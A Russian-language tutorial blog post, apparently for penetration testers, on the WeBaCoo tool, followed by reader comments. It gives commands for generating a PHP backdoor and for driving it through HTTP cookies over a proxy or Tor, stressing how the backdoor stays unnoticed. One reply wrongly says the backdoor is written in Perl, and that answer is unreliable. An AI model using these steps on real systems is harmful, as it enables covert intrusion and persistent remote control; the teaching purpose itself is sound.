Добрый день, уважаемый читатель!
Сегодня мы поговорим об инструменте этапа постэксплуатации – одного из этапов проведения пентестов. Как ты понимаешь, этап постэксплуатации очень важен тем, что мы проникли на целевую машину и наша задача выиграть для себя как можно больше времени, чтобы осмотреться и продолжить атаку на следующие элементы сети и при этом как можно дольше оставаться незамеченным.
Инструмент Webacoo интересен тем, что позволяет организовать backdoor на целевой машине посредством механизма http cookie.
Webacoo по умолчанию включен в KaliLinux. Для остальных систем необходимо сначала установить:
- perl installed
- liburi-perl
- libio-socket-socks-perl
Сам проект доступен по адресу: https://github.com/anestisb/WeBaCoo.
Также доступен модуль для использования в Metasploit: https://github.com/anestisb/WeBaCoo/blob/master/msf_webacoo_module.rb.
Работа с инструментом состоит из двух этапов.
Этап 1. Создание backdoor.
webacoo -g -f 1 -o /tmp/backdoor.php
Описание опций:
-g – указывает на создание backdoor
-f – выбирает системную функцию для исполнения команд
- system (default)
- shell_exec
- exec
- passthru
- popen
-o – задает имя генерируемого файла
Генерация backdoor:
Исходник полученного backdoor:
Этап 2. Использование backdoor.
Сначала закидываем backdoor на целевую машину, к которой у нас есть доступ и работаем с командной строкой через интерфейс webacoo.
webacoo -t -u http://url/bacdoor.php -c M_cookie -p PROXY
Описание опций:
-t – устанавливает удаленное соединение
-u – адрес backdoor
-c – задает переменную cookie
-p – использует соединение через proxy, в том числе имеется возможность использовать tor сеть.
Получаем shell на целевой машине с помощью нашего backdoor.php:
Проверяем исполнение команд на удаленной машине:
А вот так выглядят наши логи, генерируемые при использовании backdoor.php:
Как видим, механизм достаточно простой и предоставляет удобный и быстрый инструмент для дальнейших выполнений пентестов.
На этом, пока все!
Хорошего дня и успешных пентестов!
замечательно. На каком языке написан бекдор?
замечательно. Какие зависимости нужны для шела? Как я понимю он на перл написан? Нужен ли перл на машине жертвы?
Язык бэкдора perl.
Перед использование необходимо установить: perl, liburi-perl, libio-socket-socks-perl
Спасибо за статью) Весьма позновательная) Но если нужен более широкий функционал то лучше использовать weevely